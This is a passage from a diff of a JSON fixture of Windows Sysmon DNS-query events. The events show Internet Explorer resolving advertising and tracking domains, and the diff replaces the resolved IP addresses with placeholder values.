UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epm.w55c.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -1746,7 +1746,7 @@ "ProcessId": "2736", "QueryName": "pm.w55c.net", "QueryStatus": "0", - "QueryResults": "type: 5 dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:34.237.248.89;::ffff:35.153.21.25;::ffff:52.200.238.112;::ffff:52.206.93.38;::ffff:34.227.35.137;::ffff:35.169.96.208;::ffff:52.22.206.42;::ffff:52.201.81.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;", + "QueryResults": "type: 5 dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { @@ -1762,7 +1762,7 @@ { "@timestamp": "2021-05-05T15:30:51.697Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802391800Z'/\u003e\u003cEventRecordID\u003e103\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.093\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.eyereturn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.186.239.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802391800Z'/\u003e\u003cEventRecordID\u003e103\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.093\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.eyereturn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -1789,7 +1789,7 @@ "channel": "Microsoft-Windows-Sysmon/Operational", "event_data": { "QueryStatus": "0", - "QueryResults": "::ffff:35.186.239.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.093", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1824,7 +1824,7 @@ "event_id": "22", "provider_name": "Microsoft-Windows-Sysmon", "event_data": { - "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;", + "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.099", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1840,7 +1840,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802402000Z'/\u003e\u003cEventRecordID\u003e104\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.099\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.googletagservices.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802402000Z'/\u003e\u003cEventRecordID\u003e104\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.099\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.googletagservices.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { @@ -1852,7 +1852,7 @@ "ProcessId": "2736", "QueryName": "cm.adgrx.com", "QueryStatus": "0", - "QueryResults": "type: 5 rtb.adgrx.com;::ffff:173.231.178.117;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;", + "QueryResults": "type: 5 rtb.adgrx.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", @@ -1880,7 +1880,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802413000Z'/\u003e\u003cEventRecordID\u003e105\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adgrx.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 rtb.adgrx.com;::ffff:173.231.178.117;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802413000Z'/\u003e\u003cEventRecordID\u003e105\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adgrx.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 rtb.adgrx.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } @@ -1903,7 +1903,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:104.193.83.156;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;", + "QueryResults": "type: 5 j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.107", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1921,7 +1921,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802423900Z'/\u003e\u003cEventRecordID\u003e106\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecsm2waycm-atl.netmng.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:104.193.83.156;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802423900Z'/\u003e\u003cEventRecordID\u003e106\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecsm2waycm-atl.netmng.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -1991,7 +1991,7 @@ "event_data": { "QueryName": "pr-bh.ybp.yahoo.com", "QueryStatus": "0", - "QueryResults": "type: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:72.30.2.182;", + "QueryResults": "type: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.112", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -2002,7 +2002,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802433000Z'/\u003e\u003cEventRecordID\u003e107\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.112\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epr-bh.ybp.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:72.30.2.182;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802433000Z'/\u003e\u003cEventRecordID\u003e107\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.112\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epr-bh.ybp.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -2015,7 +2015,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802441200Z'/\u003e\u003cEventRecordID\u003e108\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.113\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eps.eyeota.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:3.83.220.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802441200Z'/\u003e\u003cEventRecordID\u003e108\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.113\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eps.eyeota.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -2033,7 +2033,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "::ffff:3.83.220.223;", + "QueryResults": "::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.113", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -2113,7 +2113,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802456000Z'/\u003e\u003cEventRecordID\u003e109\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 